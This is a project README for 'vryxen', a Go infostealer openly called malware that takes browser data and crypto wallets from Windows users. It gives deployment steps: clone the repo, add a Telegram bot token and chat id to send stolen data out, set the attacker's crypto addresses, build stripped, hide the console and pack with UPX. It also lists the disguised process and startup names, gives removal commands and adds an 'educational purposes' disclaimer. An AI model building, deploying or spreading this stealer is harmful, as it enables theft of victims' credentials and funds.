Go-written Malware Targeting Windows systems, extracting User Data from Browsers, Crypto Wallets and more, from every user on every disk.
Table of Contents
To install this project using Git, follow these steps:
- Clone the Repository:
git clone https://github.com/rt5555/vryxen.git ```
- Navigate to the Project Directory:
```bash
cd vryxenYou can use the Project template:
-
Open
cmd/main.goand edit config with your Telegram Bot Token, Your Chat Id, and your crypto addresses -
Build the template: (reduce binary size by using
-s -w)
go build -ldflags "-s -w"- You can hide the console without
hideconsolemodule (you must removecommon.IsAlreadyRunning()check fromcmd/main.gobefore) by running
go build -ldflags "-s -w -H=windowsgui"upx.exe --ultra-brute vryxen.exe- You can also use vryxen in your own Go code. Just import the desired module like this:
package main
import "/rt5555/vryxen/internal/hc"
func main() {
HideConsole.Hide()
}This guide will help you removing vryxen from your system
-
Open powershell as administrator
-
Kill processes that could be vryxen
taskkill /f /t /im vryxen.exe
taskkill /f /t /im SecurityHealthSystray.exe(use tasklist to list all running processes, vryxen.exe and SecurityHealthSystray.exe are the default names)
- Remove vryxen from startup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Realtek HD Audio Universal Service" /f(Realtek HD Audio Universal Service is the default name)
- Enable Windows defender:
You can also support this project development by leaving a star ⭐ or by donating me. Every little tip helps!
BTC: bc1qlhqlc4fy3wd98m8qmv05zu059j6am9jh4kj4v2
This library is released under the MIT License. See LICENSE file for more informations.
If you have any questions or need further assistance, please contact [@xretic: ](
This software, referred to as xretic, is provided strictly for educational and research purposes. Under no circumstances should this tool be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions.
By accessing and using this tool, you acknowledge that you are solely responsible for your actions. Any misuse of this software is strictly prohibited, and the creator (xretic) disclaims any responsibility for how this tool is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction.
The creator (xretic) of this tool shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use the tool.
The creator (xretic) will not provide any support, guidance, or assistance related to the misuse of this tool. Any inquiries regarding malicious activities will be ignored.
By using this tool, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use the software.